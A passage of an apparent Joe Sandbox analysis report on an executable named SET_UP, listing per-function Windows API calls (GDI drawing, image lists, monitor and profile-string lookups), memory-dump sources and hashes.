                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004AC87A
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3d), ref: 004AC894
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0050CEA0,?,?,?,?,?,?,?,?,?,?,?,?,004ABD87), ref: 004AC8B0
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dNew), ref: 004AC8C7
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dL), ref: 004AC8D9
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dH), ref: 004AC8E6
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dLNew), ref: 004AC90A
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dHNew), ref: 004AC917
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dD), ref: 004AC93B
                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000002A), ref: 004AC94E
                                                                                                                                                                                                  • GetClassInfoA.USER32(00000000,004DF3C8,?), ref: 004AC991
                                                                                                                                                                                                  • GetClassInfoA.USER32(00000000,00008002,?), ref: 004AC9AE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
                                                                                                                                                                                                  • String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
                                                                                                                                                                                                  • API String ID: 1233821986-3277416593
                                                                                                                                                                                                  • Opcode ID: 32411f80ae35bcbf65a875fe81586005ea19eb087d9328ee044a3d7653ec3edd
                                                                                                                                                                                                  • Instruction ID: a0859a0317ac4a7d44fa800987f83c3685647439799cf4c29252688219810628
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32411f80ae35bcbf65a875fe81586005ea19eb087d9328ee044a3d7653ec3edd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8241E6766403009AD791AB65ECC1B6E3BA8FF66351F44052BE800973E0DBFC584A9B69
                                                                                                                                                                                                  Function 004AD590 Relevance: 37.8, APIs: 25, Instructions: 294windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: SetBkColor.GDI32(?), ref: 004ABABD
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004ABB0A
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004ABB39
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: SetBkColor.GDI32(?,?), ref: 004ABB57
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004ABB82
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004ABBBC
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004AD5D2
                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 004AD5E5
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004AD60C
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD623
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD63C
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD654
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD66E
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004AD693
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004AD6B7
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004AD6D7
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004AD6ED
                                                                                                                                                                                                  • PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 004AD71B
                                                                                                                                                                                                  • PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 004AD73C
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004AD752
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004AD76C
                                                                                                                                                                                                  • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 004AD794
                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 004AD79F
                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 004AD7B0
                                                                                                                                                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 004AD83C
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: SetBkColor.GDI32(?,00000000), ref: 004ABBC4
                                                                                                                                                                                                  • DrawTextA.USER32(?,?,?,?,00000020), ref: 004AD874
                                                                                                                                                                                                  • GetFocus.USER32 ref: 004AD880
                                                                                                                                                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 004AD891
                                                                                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 004AD8A2
                                                                                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 004AD8AE
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004AD8C1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1611134597-0
                                                                                                                                                                                                  • Opcode ID: 48da5025d427ca32c1dab687d2e3aa91c9e3ad2df32186c76da564dcd1c277a7
                                                                                                                                                                                                  • Instruction ID: 2fb06e4636c8d7688e320448532e604d4d98861aab7d315f30fc1400dd2601bc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48da5025d427ca32c1dab687d2e3aa91c9e3ad2df32186c76da564dcd1c277a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EB17A75208202AFD304CF59CD85E6BBBE8FB99708F004A1CF59AD3291DB75E941CB66
                                                                                                                                                                                                  Function 004C0160 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 266windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C0165
                                                                                                                                                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 004C01A8
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004C01BE
                                                                                                                                                                                                  • InflateRect.USER32(?,?,?), ref: 004C01D4
                                                                                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 004C01E5
                                                                                                                                                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 004C01EF
                                                                                                                                                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004C0202
                                                                                                                                                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 004C022C
                                                                                                                                                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004C0277
                                                                                                                                                                                                  • SetRectRgn.GDI32(?,?,?,?,?), ref: 004C0294
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004C029F
                                                                                                                                                                                                  • InflateRect.USER32(?,?,?), ref: 004C02B5
                                                                                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 004C02C4
                                                                                                                                                                                                  • SetRectRgn.GDI32(?,?,?,?,?), ref: 004C02D9
                                                                                                                                                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 004C02FA
                                                                                                                                                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004C0312
                                                                                                                                                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 004C033C
                                                                                                                                                                                                    • Part of subcall function 004C00ED: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004BF5E2), ref: 004C012C
                                                                                                                                                                                                    • Part of subcall function 004C00ED: CreatePatternBrush.GDI32(00000000), ref: 004C0139
                                                                                                                                                                                                    • Part of subcall function 004C00ED: DeleteObject.GDI32(00000000), ref: 004C0145
                                                                                                                                                                                                    • Part of subcall function 004B971F: SelectClipRgn.GDI32(?,00000000), ref: 004B9741
                                                                                                                                                                                                    • Part of subcall function 004B971F: SelectClipRgn.GDI32(?,?), ref: 004B9757
                                                                                                                                                                                                    • Part of subcall function 004B93E3: SelectObject.GDI32(?,00000000), ref: 004B9405
                                                                                                                                                                                                    • Part of subcall function 004B93E3: SelectObject.GDI32(?,?), ref: 004B941B
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 004C0392
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 004C03E6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
                                                                                                                                                                                                  • String ID: VGL$hGL
                                                                                                                                                                                                  • API String ID: 4023391435-4226939623
                                                                                                                                                                                                  • Opcode ID: 23b61e129ae4ccbfd7f540a8e1178f025787340e7eb109f2120baa17673dec58
                                                                                                                                                                                                  • Instruction ID: ade47616a46ee2ccb1e894fe5b01775cb75e183297a05b3663ac00c51c0f2424
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23b61e129ae4ccbfd7f540a8e1178f025787340e7eb109f2120baa17673dec58
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEA1F372900159EFCF05DFE5C995DEEBBB9EF18304F10412AF906A2291DB39AE05CB64
                                                                                                                                                                                                  Function 004ADE20 Relevance: 30.2, APIs: 20, Instructions: 246COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetPropA.USER32(?,?), ref: 004ADE65
                                                                                                                                                                                                  • CallWindowProcA.USER32(00000000), ref: 004ADE8D
                                                                                                                                                                                                    • Part of subcall function 004AB9C0: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 004AB9E6
                                                                                                                                                                                                    • Part of subcall function 004AB9C0: RemovePropA.USER32(?,?), ref: 004AB9FE
                                                                                                                                                                                                    • Part of subcall function 004AB9C0: RemovePropA.USER32(?,?), ref: 004ABA0A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Prop$CallProcRemoveWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2276450057-0
                                                                                                                                                                                                  • Opcode ID: 5f5643829b2bbe78a6361ed387e346e8c61a4b0c33b86b7040a1ff3f3611a4fc
                                                                                                                                                                                                  • Instruction ID: e420809f7bb6e0a59cb5b0557275ba896673fd54bbd538bc7d970202323a7302
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f5643829b2bbe78a6361ed387e346e8c61a4b0c33b86b7040a1ff3f3611a4fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46618976A453146FD220AB56EC48FAF3758EBA7361F000436FA12923C1DB6D990187BE
                                                                                                                                                                                                  Function 004B4B6C Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004B4B97
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 004B4BBA
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004B4BD3
                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004B4BE6
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004B4C33
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004B4C3D
                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004B4C46
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004B4C62
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                                                                                  • String ID: ($@
                                                                                                                                                                                                  • API String ID: 808654186-1311469180
                                                                                                                                                                                                  • Opcode ID: 1885b43dcfa7d0484711776ab88e538bc32a75fc2bd2691fb5dee4302ce6b082
                                                                                                                                                                                                  • Instruction ID: 0e5bd8c50f8d0d7955027a3f6b8668c66136e3f35a0d37c1a192bc7bdb0b0d18
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1885b43dcfa7d0484711776ab88e538bc32a75fc2bd2691fb5dee4302ce6b082
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A517372A04619AFDB11DBA8CC85FEEBBB9AF84714F154126E901F3281D734E9058B68
                                                                                                                                                                                                  Function 00409365 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040936A
                                                                                                                                                                                                    • Part of subcall function 004B051D: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 004B0532
                                                                                                                                                                                                    • Part of subcall function 00402821: LoadBitmapW.USER32(?,?), ref: 00402833
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FF00FF,000000A9,?,?,?,?,?,0040917D,?), ref: 004093D0
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FF00FF,000000C0,?,?,?,?,?,0040917D,?), ref: 00409416
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FF00FF,00000082,?,?,?,?,?,0040917D,?), ref: 0040945C
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000DE,?,?,?,?,?,0040917D,?), ref: 004094A7
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000CC,?,?,?,?,?,0040917D,?), ref: 004094ED
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000BF,?,?,?,?,?,0040917D,?), ref: 00409533
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,0000009B,?,?,?,?,?,0040917D,?), ref: 00409579
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FF00FF,000000A4,?,?,?,?,?,0040917D,?), ref: 004095C3
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FF00FF,00000097,?,?,?,?,?,0040917D,?), ref: 0040961E
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000A8,?,?,?,?,?,0040917D,?), ref: 00409670
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000DF,?,?,?,?,?,0040917D,?), ref: 004096C9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ImageList_$Masked$BitmapCreateH_prologLoad
                                                                                                                                                                                                  • String ID: <L$VGL
                                                                                                                                                                                                  • API String ID: 198358146-514139165
                                                                                                                                                                                                  • Opcode ID: b19502c1f23d2aba3ba9163309251bf3035561fdb678f7f6cf6f208774932536
                                                                                                                                                                                                  • Instruction ID: ec2b9814fbc9ecde94d479c8f6e46199daff313f5f7dab3fb59c7477b83db8de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b19502c1f23d2aba3ba9163309251bf3035561fdb678f7f6cf6f208774932536
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42A1567169030A6AE720EBB1CD57FFF73B8AF14709F500529B612B60D1DBB86E04CA25
                                                                                                                                                                                                  Function 00495AC4 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(USER32,00000000,?,75C04A40,00495BFD,?,?,?,?,?,?,?,004B4C54,00000000,00000002,00000028), ref: 00495AE6
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00495AFE
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00495B0F
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495B20
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00495B31
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00495B42
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00495B53
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                  • String ID: EnumDisplayMonitors$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                                                                                  • API String ID: 667068680-2547861404
                                                                                                                                                                                                  • Opcode ID: 540b09dfbc93f48e510518afd08754dc04e3d96cb64f543550252be3d951004e
                                                                                                                                                                                                  • Instruction ID: 4201b0d532340dd68414abd755048fe9f95cfbc804aa8f7992f09b89358cf7ae
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 540b09dfbc93f48e510518afd08754dc04e3d96cb64f543550252be3d951004e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B11181B5D517129AC7128F25ACC092EBEE0B32C766374443FE004D2291DB7C5449EB5E
                                                                                                                                                                                                  Function 004AC770 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 44stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0050CEA0,75C04920,74DEB510,?,?,?,?,?,?,?,?,?,?,?,?,004ABD87), ref: 004AC787
                                                                                                                                                                                                  • GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 004AC7B0
                                                                                                                                                                                                  • lstrcmpiA.KERNEL32(?,kanji), ref: 004AC7C2
                                                                                                                                                                                                  • GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 004AC7E5
                                                                                                                                                                                                  • lstrcmpiA.KERNEL32(?,hangeul), ref: 004AC7F1
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0050CEA0,?,?,?,?,?,?,?,?,?,?,?,?,004ABD87), ref: 004AC803
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
